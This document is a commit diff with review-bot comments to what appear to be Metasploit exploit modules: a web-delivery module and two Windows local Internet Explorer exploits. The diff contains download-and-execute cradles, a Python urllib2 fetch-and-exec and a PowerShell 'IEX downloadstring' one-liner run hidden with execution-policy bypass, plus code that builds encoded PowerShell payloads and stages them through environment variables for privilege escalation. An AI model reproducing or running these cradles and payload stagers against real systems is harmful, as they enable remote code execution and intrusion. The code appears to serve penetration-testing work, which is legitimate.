
Commit b0a596b

committed
Update newer modules
1 parent 5f05336 commit b0a596b


3 files changed

+21
-3
lines changed


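--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -87,7 +87,11 @@ def primer
 print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
 when "PSH_x86", "PSH_x64"
 download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+print_line generate_psh_command_line({
+:noprofile => true,
+:windowstyle => 'hidden',
+:command => download_and_run
+})
 end
 end
 end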
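Review bot: The replacement call in the `PSH_x86`/`PSH_x64` branch changes the printed one-liner in two ways the commit message does not mention: nothing corresponding to the old `-ep bypass` is passed, and the explicit `\"…\"` around the command is now left to `generate_psh_command_line`, whose output is not visible in this hunk. If both are intended, say so in a comment above the call, e.g. `# command line now built by generate_psh_command_line; -ep bypass intentionally dropped`. The literal shape of the command also changes, so any documentation or detection content keyed on the old `-w hidden -nop -ep bypass -c` string needs updating. For consistency with the python branch just above, prefer the parenthesised form `print_line(generate_psh_command_line(:noprofile => true, :windowstyle => 'hidden', :command => download_and_run))`. `primer` and its `case` begin above the hunk.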

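--- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
+++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb
@@ -79,7 +79,14 @@ def exploit
 end
 
 def primer
-cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+cmd = cmd_psh_payload(payload.encoded,
+payload_instance.arch.first,
+{
+:remove_comspec => true
+}
+)
+
+cmd.gsub!('powershell.exe ','')
 session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
 
 html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"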
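Review bot: The added `cmd.gsub!('powershell.exe ','')` in `primer` removes every occurrence of that literal rather than only the leading program name, and it silently does nothing if the helper's output ever starts differently; the same statements are added in `exploit` in ms14_009_ie_dfsvc.rb. An anchored form states the intent more precisely: `cmd = cmd.sub(/\Apowershell\.exe /, '')`. The removed line also ended in `.strip`, which the new code drops without saying whether `cmd_psh_payload` already returns a trimmed string when `:remove_comspec` is set; either keep the `.strip` or add a comment recording that it is no longer needed. Because the two modules now carry an identical eight-line sequence, a small shared helper would keep them from drifting apart. `primer` continues past the end of the hunk.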

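--- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
+++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb
@@ -148,7 +148,14 @@ def exploit
 
 print_good(".NET looks vulnerable, exploiting...")
 
-cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+cmd = cmd_psh_payload(payload.encoded,
+payload_instance.arch.first,
+{
+:remove_comspec => true
+}
+)
+
+cmd.gsub!('powershell.exe ','')
 session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
 
 temp = get_env('TEMP')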
